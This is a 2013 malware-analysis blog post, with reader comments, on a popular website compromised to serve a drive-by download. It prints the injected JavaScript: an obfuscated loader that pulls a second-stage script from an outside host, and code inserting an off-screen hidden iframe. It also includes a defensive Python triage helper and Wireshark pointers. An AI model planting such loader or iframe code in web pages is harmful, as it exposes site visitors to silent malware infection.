Yesterday on, Malware

Nov 12, 13

On 2013-11-10 one of our research systems discovered that the website was hosting a drive-by download that resulted in malware being installed on vulnerable systems that visited it. As with the compromise we posted about a few weeks ago, a very popular site serving malware can quickly compromise a large number of users. According to Alexa, comes in at the 650th most popular site in the world, and 289th in the US, meaning thousands of visitors were exposed.

The exploit was served via malicious javascript on

// The loader URL is split into string fragments that are only joined at runtime,
// so it never appears as a single literal in the page source
var tyi = "cdm."; var itwo = "cracked"; var itto = "/"; var phw = "php"; var jfw = "src";
var fscr = "script"; var twi = "i"; var htp = "http"; var vol54 = "src";
// Writes a <script src="http://..."></script> tag that pulls in the next stage
document.write("<"+fscr+" "+jfw+"="+htp+":"+itto+""+itto+""+twi+"."+itwo+""+tyi+"com"+itto+""+twi+"."+phw+"><"+itto+""+fscr+">");

This sends a request to, a domain registered on 2013-11-04, so we can assume that those responsible had the ability to serve their content from at least that date.

From there an iframe is inserted pointing to

var urla = '';  // second-stage URL (omitted here)
var divTag = document.createElement('div'); divTag.id = 'ad3';
document.body.appendChild(divTag);
var fr3 = document.createElement('iframe'); fr3.width = '88px'; fr3.height = '31px';
// Pushed 8000px off the left edge of the page so the frame never renders in view
fr3.setAttribute('style', 'position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');
fr3.setAttribute('src', urla);
document.getElementById('ad3').appendChild(fr3);

From there a blend of malicious PDF, Java and HTML/JavaScript files is sent to the browser, and upon success the malware itself is downloaded and installed on the compromised system, leaving the user little indication that anything has happened except that the Java plugin has launched and the system is low on memory.
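As an added example (not code from the original post), a small static triage helper in Python: it folds a string-fragment loader of the kind shown above into the tag it would write, without executing anything, and flags the off-screen iframe pattern. Both inputs are constructed copies of the two snippets with a placeholder host, not the real samples.

```python
import re

# Constructed samples modelled on this post's two snippets; the loader host
# "loadercdn.example.test" is a placeholder, not the real domain.
SAMPLE_LOADER = (
    'var tyi = "cdn."; var itwo = "loader"; var itto = "/"; var phw = "php"; '
    'var jfw = "src"; var fscr = "script"; var twi = "i"; var htp = "http"; '
    'var vol54 = "src";'
    'document.write("<"+fscr+" "+jfw+"="+htp+":"+itto+""+itto+""+twi+"."'
    '+itwo+""+tyi+"example.test"+itto+""+twi+"."+phw+"><"+itto+""+fscr+">");'
)
SAMPLE_IFRAME = (
    "var urla='';var divTag=document.createElement('div');divTag.id='ad3';"
    "document.body.appendChild(divTag);var fr3=document.createElement('iframe');"
    "fr3.width='88px';fr3.height='31px';fr3.setAttribute('style','position: "
    "absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');"
    "fr3.setAttribute('src',urla);document.getElementById('ad3').appendChild(fr3);"
)

VAR_RE = re.compile(r'var\s+([\w$]+)\s*=\s*([\'"])(.*?)\2\s*;')
WRITE_RE = re.compile(r'document\.write\((.*?)\);', re.S)
TOKEN_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'|([A-Za-z_$][\w$]*)')
OFFSCREEN_RE = re.compile(r'(?:left|top)\s*:\s*-(\d+)px')


def fold_document_write(src):
    """Resolve the string fragments concatenated into document.write()
    without executing anything: collect the literal var assignments, then
    substitute them into the argument expression token by token."""
    consts = {name: val for name, _q, val in VAR_RE.findall(src)}
    m = WRITE_RE.search(src)
    if not m:
        return None
    out = []
    for lit1, lit2, name in TOKEN_RE.findall(m.group(1)):
        out.append(consts.get(name, "<?%s>" % name) if name else lit1 + lit2)
    return "".join(out)


def hidden_iframe_indicators(src):
    """Heuristics for the off-screen iframe pattern: an iframe created by
    script, pushed far outside the viewport, with overflow hidden."""
    reasons = []
    if re.search(r"createElement\(\s*['\"]iframe['\"]\s*\)", src):
        reasons.append("creates iframe")
    for m in OFFSCREEN_RE.finditer(src):
        if int(m.group(1)) >= 1000:
            reasons.append("positioned %spx off-screen" % m.group(1))
    if re.search(r"overflow(?:-[xy])?\s*:\s*hidden", src):
        reasons.append("overflow hidden")
    return reasons
```

Folding the concatenation statically gives you the second-stage URL to block or hunt for in proxy logs without ever running the attacker's script.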


As of the time of this post the malware is detected by 7 out of the 46 antivirus engines tested by

Further details of the behavior of the malware itself can be seen at

Here is a link to the full pcap (50c691bad0ba43d4370e2be0dd873e83, 4.3M) for your own further analysis and study. It seems that, intentionally or otherwise, the attackers employed some techniques that make packet analysis a bit more difficult than usual, so be prepared to go a bit beyond your standard methodology.

We attempted to contact with this information, but unfortunately they provide no security contact information on their website, their bounces, and so far they have not responded to messages to their Twitter account. So if you know anyone involved in running that site, they might appreciate you sharing this post with them.


A few more details about the pcap since we’ve had some questions.

Frame number 66 is the response from (after a redirect). You can see the malicious JS inserted alongside their Twitter feed: line 1645 if you extract the text response, or search for "paddingLeftFooter twitterLogo" and you'll find it.

The request to /i.php on begins in frame 1251.

The exploits and the payload are delivered from in multiple requests beginning at frames 1495, 2565, 2567, 2581, and several others. If you're exploring, the easiest way to see this part is to use 'http contains ""' as your Wireshark filter.

Happy analyzing.

Update 2013-11-14:

One of the site administrators (David Wong) of has posted to their forums that the team fixed the problem Tuesday afternoon. hxxp://

It seems the site being compromised and serving malware has been a recurring problem with, each time met with a somewhat lax approach ("Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?") on their forums. This, combined with not alerting site visitors so they know what has happened and what remediation steps they can take to clean up their systems, tends to indicate that should be avoided if you're concerned with malware.


  1. As a frequent user of, I’m reasonably worried by this. How would one go about containing and eliminating it, if their machine had been infected?

  2. anonymous /

    For the easiest way to notify them is the forums.

  3. i think making a list of the 7 ways i feel most betrayed is in order.

  4. It’s very frustrating and disheartening that every time Java has another security flaw or is used for some deviant purpose, people freak out and disable JavaScript thinking they’re either the same thing, are somehow related, or getting them mixed up. JavaScript is harmless and can really only be used for two purposes: to vastly improve the user experience, or to create annoying popups (that’s about the worst thing it can do). When people disable JS, it makes my job much more difficult because then I have to build multiple versions of every site for a fallback, and it degrades the user experience and makes it so that all of my effort is in vain.

    There needs to be some kind of widespread public service announcement that JavaScript is safe and is not Java!

    • I’ll just toss out all my JS webshells then, clearly they aren’t malicious anymore.

      JavaScript has many unsafe functions, and malicious iframes are not “just annoying”, they are responsible for a ridiculous amount of drive-by downloads and theft of credentials and personal information.

      A simple search for “malicious javascript” brings a wealth of information, but here’s the top hit:

      I can’t REMEMBER the last time I saw a browser-based exploit in the wild that didn’t leverage JavaScript in some way. JS not only can be used to do sketchy shit, but in general, we can READ what’s happening with JavaScript because it runs in our client, not the server, that lets us mess with your code and perform all sorts of lovely little attacks.

      Source: CyberWarrior fighting the APT with the Big Data in The Cloud

    • Matthew /

      Though the payload of an exploit is delivered by Java (or Flash / PDF etc.), the fact remains that JavaScript IS often a vector for setting things up.

      Therefore, limiting availability of JavaScript to trusted sites only (e.g. the NoScript plugin) is a positive security step.
      Yes, many sites will break without it, but there is no good reason to add more.

      I would EXPECT any site that isn’t specifically delivering interactivity, to be able to work under “restricted zone” conditions.

    • Sorry, Amit, but you sound terribly misinformed. Try playing around with some Metasploit payloads and BeEF Framework and tell me that JavaScript is harmless.

  5. JavaScript isn’t as safe as you say. I understand the frustration with getting it confused with Java, but as you can see from the article it was used to cause the download of the file that caused this. Not only can it cause annoying popups, but it can also open hidden iframes to malicious URLs (among other things).

    It can be used to do a ton of stuff that the normal user would never know about. So, disabling JavaScript is not necessarily a bad idea. I have it disabled by default for sites I have never been to.

    There are many other tools out there you can use to make your site user-friendly like HTML5 and CSS3 😉

  6. ummm amit… I think that this is a javascript thing on their website…. It is an iFrame that points to another website. SO in this case it is javascript that is the issue, where the bigger issue is how the malware was actually coded into the website.